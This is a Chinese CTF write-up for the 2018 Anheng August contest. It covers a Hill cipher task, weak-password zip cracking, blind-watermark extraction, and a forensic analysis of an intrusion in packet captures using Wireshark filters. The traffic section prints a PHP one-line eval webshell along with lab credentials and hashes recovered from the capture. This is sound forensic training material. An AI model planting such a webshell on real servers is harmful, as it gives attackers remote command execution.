飘零表哥真是太强了,web和pwn和Re可以看看老哥的博客http://skysec.top/2018/08/25/2018安恒月赛Writeup/
这次的密码和杂项有丶简单,之前跟着飘零老哥的步伐做了两套流量题之后觉得安恒的流量题还是比较简单的

密码学 --- 爬坡道

给了一张图片。binwalk+foremost提取出里面的一个压缩包解压得到另一个图片
2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog

解压的图片
2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog

题目名称是爬坡,有矩阵形式的秘钥,不难想到是希尔加密

求出秘钥的逆矩阵,同时把密文转化成矩阵【注意得竖着,我横着没做对】

2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog

计算乘积

2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog

为了方便点我直接拷贝着算了

2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog

最后得到答案:

teilseyneetn
hhlivritrsig
==>  the hill is very interesting

杂项

给了个压缩包提示弱密码;所有字符跑到7位跑不动了。用纯数字直接解出来了

2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog

解压后得到两个图片,分析一波感觉像盲水印

python bmp.py decode 1.png 2.png flag.png

GET FLAG
2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog

流量分析

流量分析题1
某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器:

流量分析题2
某公司内网网络被黑客渗透,请分析流量,得到黑客扫描到的登陆后台是(相对路径即可):

流量分析题3
某公司内网网络被黑客渗透,请分析流量,得到黑客使用了什么账号密码登陆了web后台(形式:username/password):

流量分析题4
某公司内网网络被黑客渗透,请分析流量,得到黑客上传的webshell文件名是,内容是什么,提交webshell内容的base编码:

流量分析题5
某公司内网网络被黑客渗透,请分析流量,黑客在robots.txt中找到的flag是什么:

流量分析题6
某公司内网网络被黑客渗透,请分析流量,黑客找到的数据库密码是多少:

流量分析题7
某公司内网网络被黑客渗透,请分析流量,黑客在数据库中找到的hash_code是什么:

流量分析题8
某公司内网网络被黑客渗透,请分析流量,黑客破解了账号ijnu@test.com得到的密码是什么:

流量分析题9
某公司内网网络被黑客渗透,请分析流量,被黑客攻击的web服务器,网卡配置是是什么,提交网卡内网ip:

流量分析题10
某公司内网网络被黑客渗透,请分析流量,黑客使用了什么账号登陆了mail系统(形式: username/password):

流量分析题11
某公司内网网络被黑客渗透,请分析流量,黑客获得的vpn,ip是多少:

流量分析题12
某公司内网网络被黑客渗透,请分析流量,黑客获得的vpn,ip是多少:

解压后的压缩包名字很友好,是mail1-2 vpn1-2 web1-2

level-1

2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog
翻着翻着发现一个很有意思的扫描器指纹,应该就是AWVS无疑了

level- 2 & 3

http and http contains admin and http contains password 
>> /admin/login.php
>> admin!@#pass123

2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog
找了半天终于找到了,在login.php?rec=login的最后一个应该就是成功登陆了

level-4

http
>> a.php
>> eval(b64decode...)
>> <?php @eval($_POST[1234]);?> 【b64编码】

之后有个a.php访问频繁应该就是马了
2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog

顺着马的轨迹,我们找到黑客如何把马给post上去的,其实能够发现的一点是小马的密码是1234。

level-5

http and http.request.full_uri contains robots.txt
>> flag:87b7cb79481f317bde90c116cf36084b
2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog

level-6

http contains "php" or http contains "db"

数据库的密码应该是从马这边拿到手的,马干的事情不是很多,甚至能够一条一条看出来
2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog

level-7

tcp contains "hash_code"
>> hash_code d1c029893df40cb0f47bcf8f1c3c17ac
2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog

level-8

# web2
tcp contains "ijnu@test.com"
>> b78f5aa6e1606f07def6e839121a22ec
>> somd5解一下 ===> edc123!@#
2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog

level-9

http contains "lo"
>> 10.3.3.100
>> 192.168.32.189 # 外网
2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog

level-10

# MAILTWO
http.request.method == POST

第一个包翻来翻去找不到,第二个包一下子就找到了
2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog

level-11/12

tcp
2018安恒8月赛Writeup(除web,pwn,re)-ShaoBaoBaoEr's Blog

搜一下TCP。就这两个地址,交上去,答案是10.3.4.3